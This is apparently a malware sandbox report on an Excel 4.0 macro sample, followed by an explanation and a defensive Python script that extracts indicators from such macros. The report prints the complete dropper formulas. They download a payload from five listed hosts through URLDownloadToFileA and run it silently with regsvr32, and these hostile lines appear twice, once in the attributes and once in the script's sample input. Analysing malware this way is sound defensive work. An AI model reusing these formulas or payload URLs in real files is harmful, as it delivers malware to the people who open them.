General

  • Target

    32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

  • Size

    69KB

  • Sample

    241121-aceyjswcrd

  • MD5

    4083f6a9cb4bed287b1efa9203c177ca

  • SHA1

    75805a36fe4eaa64b99a4b640b5f6efd0fd1197a

  • SHA256

    32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

  • SHA512

    51cb5e44e5454ecfed2435b1846e8c2e9a16daac6ab714d446088013cebfac5d7efc89de5d3f88f4e1a15c44b61f1e41974e01e11be7e292be27ecaca4b1fedd

  • SSDEEP

    1536:9p0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:8zWhxHjh88ZoH7juFuZiQg

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://vasilestudio.com/wp-admin/pZ1vbd5Z/

https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/

https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/

https://triclicks.net/wp-admin/bv/

https://thecanadianarab.com/wp-content/VJ/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vasilestudio.com/wp-admin/pZ1vbd5Z/","..\aua.ocx",0,0)
    =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/","..\aua.ocx",0,0))
    =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/","..\aua.ocx",0,0))
    =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://triclicks.net/wp-admin/bv/","..\aua.ocx",0,0))
    =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thecanadianarab.com/wp-content/VJ/","..\aua.ocx",0,0))
    =IF('EFWFSFG'!D23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aua.ocx")
    =RETURN()
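
The formula chain above is a plain download-and-execute dropper: the first CALL pulls the payload through urlmon!URLDownloadToFileA into ..\aua.ocx; each following IF tries the next URL only when a cell on sheet 'EFWFSFG' (presumably holding the previous call's return value) is negative, which is how a failed HRESULT reads as a signed 32-bit long; the last IF closes the workbook if every download failed; and EXEC registers the dropped file with regsvr32 /s, the silent switch. The Python below is an added example, not part of the sandbox output, that parses formulas in this shape as a macro extractor would emit them and pulls out the IOCs and behaviours a responder wants. The sample input is constructed from this report's formula list; the LOLBin set and the verdict thresholds are the example's own assumptions.

```python
"""Static triage of Excel 4.0 (XLM) macro formulas. Added example for this
report, not sandbox output: it takes the text a macro extractor (oletools'
olevba, XLMMacroDeobfuscator) prints, one formula per line, and returns IOCs."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: this report's formulas, one per line; raw strings keep "..\aua.ocx" literal.
SAMPLE_FORMULAS = [
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vasilestudio.com/wp-admin/pZ1vbd5Z/","..\aua.ocx",0,0)',
    r"""=IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/","..\aua.ocx",0,0))""",
    r"""=IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/","..\aua.ocx",0,0))""",
    r"""=IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://triclicks.net/wp-admin/bv/","..\aua.ocx",0,0))""",
    r"""=IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thecanadianarab.com/wp-content/VJ/","..\aua.ocx",0,0))""",
    r"""=IF('EFWFSFG'!D23<0,CLOSE(0),)""",
    r'=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aua.ocx")',
    r"=RETURN()",
]

IF_RE = re.compile(r"^=IF\((?P<ref>(?:'[^']*'!)?\$?[A-Z]+\$?\d+)\s*(?P<op><>|<=|>=|<|>|=)\s*(?P<val>-?\d+),", re.I)
CALL_RE = re.compile(r"\bCALL\((?P<args>.*)\)", re.I)
EXEC_RE = re.compile(r'\bEXEC\("(?P<cmd>[^"]*)"', re.I)
CLOSE_RE = re.compile(r"\bCLOSE\(", re.I)
QUOTED_RE = re.compile(r'"([^"]*)"')
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
PATH_RE = re.compile(r"[\\/]|\.[A-Za-z0-9]{2,4}$")
# Assumed set of signed Windows binaries routinely abused to run a dropped payload.
LOLBINS = {"regsvr32", "rundll32", "mshta", "certutil", "wscript", "cscript",
           "powershell", "cmd", "msiexec", "bitsadmin"}


@dataclass
class XlmTriage:
    urls: set[str] = field(default_factory=set)
    drop_paths: set[str] = field(default_factory=set)
    lolbins: set[str] = field(default_factory=set)
    api_calls: list[tuple[str, str]] = field(default_factory=list)  # (dll, function), in order
    fallback_checks: list[str] = field(default_factory=list)  # IF() conditions guarding a CALL()
    exec_cmds: list[str] = field(default_factory=list)
    closes_on_failure: bool = False
    silent_regsvr32: bool = False
    executes_dropped_file: bool = False


def _exe_name(cmd: str) -> str:
    # Lower-cased basename of the first command-line token, minus ".exe".
    tokens = cmd.strip().split()
    if not tokens:
        return ""
    name = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def analyze(formulas: list[str]) -> XlmTriage:
    t = XlmTriage()
    for raw in formulas:
        f = raw.strip()
        cond = IF_RE.match(f)
        call = CALL_RE.search(f)
        if call:
            q = QUOTED_RE.findall(call["args"])
            if len(q) >= 2:
                t.api_calls.append((q[0].lower(), q[1]))
            for s in q[3:]:  # q[2] is the type signature ("JJCCBB"); string args follow it
                if URL_RE.match(s):
                    t.urls.add(s)
                elif PATH_RE.search(s):
                    t.drop_paths.add(s)
            if cond:  # CALL fires only when a prior result cell is negative: a retry chain
                t.fallback_checks.append(f"{cond['ref']}{cond['op']}{cond['val']}")
        if cond and CLOSE_RE.search(f):
            t.closes_on_failure = True
        ex = EXEC_RE.search(f)
        if ex:
            cmd = ex["cmd"]
            t.exec_cmds.append(cmd)
            exe = _exe_name(cmd)
            if exe in LOLBINS:
                t.lolbins.add(exe)
            if exe == "regsvr32" and "/s" in cmd.lower().split():
                t.silent_regsvr32 = True
    # Tie download to execution: does any EXEC() command reference a dropped path?
    t.executes_dropped_file = any(p in c for c in t.exec_cmds for p in t.drop_paths)
    return t


def verdict(t: XlmTriage) -> str:
    if t.urls and t.executes_dropped_file:
        return "malicious"  # the download-and-execute chain is complete
    if t.urls or t.api_calls or t.exec_cmds:
        return "suspicious"
    return "no-findings"


if __name__ == "__main__":
    triage = analyze(SAMPLE_FORMULAS)
    print(verdict(triage), triage, sep="\n")
```

The parser keys on structure rather than on the specific strings, so the same code scores any CALL/EXEC-based XLM dropper; the string after the type signature that is not a URL is taken as the drop path, and the verdict only becomes "malicious" once an EXEC line actually names a path that was downloaded.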

Extracted

Language
xlm4.0

Source          URLs
xlm40.dropper   https://vasilestudio.com/wp-admin/pZ1vbd5Z/
xlm40.dropper   https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/
xlm40.dropper   https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/
xlm40.dropper   https://triclicks.net/wp-admin/bv/
xlm40.dropper   https://thecanadianarab.com/wp-content/VJ/

Targets

    • Target

      32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

    • Size

      69KB

    • MD5

      4083f6a9cb4bed287b1efa9203c177ca

    • SHA1

      75805a36fe4eaa64b99a4b640b5f6efd0fd1197a

    • SHA256

      32c1b344244a44a70508ebe2049120510c719a0f6821738ee88089cce702b0ff

    • SHA512

      51cb5e44e5454ecfed2435b1846e8c2e9a16daac6ab714d446088013cebfac5d7efc89de5d3f88f4e1a15c44b61f1e41974e01e11be7e292be27ecaca4b1fedd

    • SSDEEP

      1536:9p0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:8zWhxHjh88ZoH7juFuZiQg

    Score
    10/10
